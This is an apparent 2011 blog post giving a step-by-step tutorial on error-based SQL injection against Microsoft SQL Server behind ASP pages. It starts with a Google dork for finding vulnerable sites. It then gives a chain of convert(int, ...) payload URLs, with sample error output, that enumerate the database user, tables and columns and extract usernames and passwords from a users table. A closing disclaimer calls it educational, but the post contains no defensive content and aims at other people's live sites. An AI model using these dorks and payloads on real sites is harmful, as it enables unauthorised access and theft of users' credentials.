Thursday, November 3, 2011

MSSQL Injection


MSSQL Injection

Ex: google dork
inurl:.asp?id=
find a result like :
http://www.somesite.com/some.asp?ID=12
Now to check if it is vuln or not

insert single quotation ' at the last :
http://www.somesite.com/some.asp?ID=12’
you get error like this:
-------------------------------------------------
Error:Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/some.asp, line 86      
-------------------------------------------------
Then you can proceed

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)

(* here you can observe that we are trying to convert but it doesn’t happen which inturn shows the db name that it cant convert into int).

So it shows error , by showing the db name  like:
--------------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'usr' to a column of data type int.
/some.asp, line 86
---------------------------------------------------------------
In the error it shows some db name as “usr” .
Now
We try to bring all the available tables in a database :

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables))
(here information_schema is the database , this you can find in myphp).
We get error like :
----------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'galery' to a column of data type int.
/some.asp, line 86
-----------------------------------------------

(here table name is galery)

But no login credentials will be in the galery table ,To find the Second table name

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))

we get table name as users
now to find columns in users table:

http://www.somesite.com/site.asp?ID=12+and+1=convert(int,select+top+1+column_name+from+information_schema.columns+where+table_name='users'))

we get this

-----------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'username' to a column of data type int.
/some.asp, line 86
-----------------------------------------------
To find second column folow the above step like finding the second table name
Now we need to find the values in the table with columns username and password

http://www.somesite.com/some.asp?ID=12 and+1=convert(int,(select+top+1+username+from+users))
 same as like for finding value in password field too.
Got it.?

[ * Warning : Im not responsible for your actions , this is for educational purpose only . ]

Twitter Delicious Facebook Digg Stumbleupon Favorites More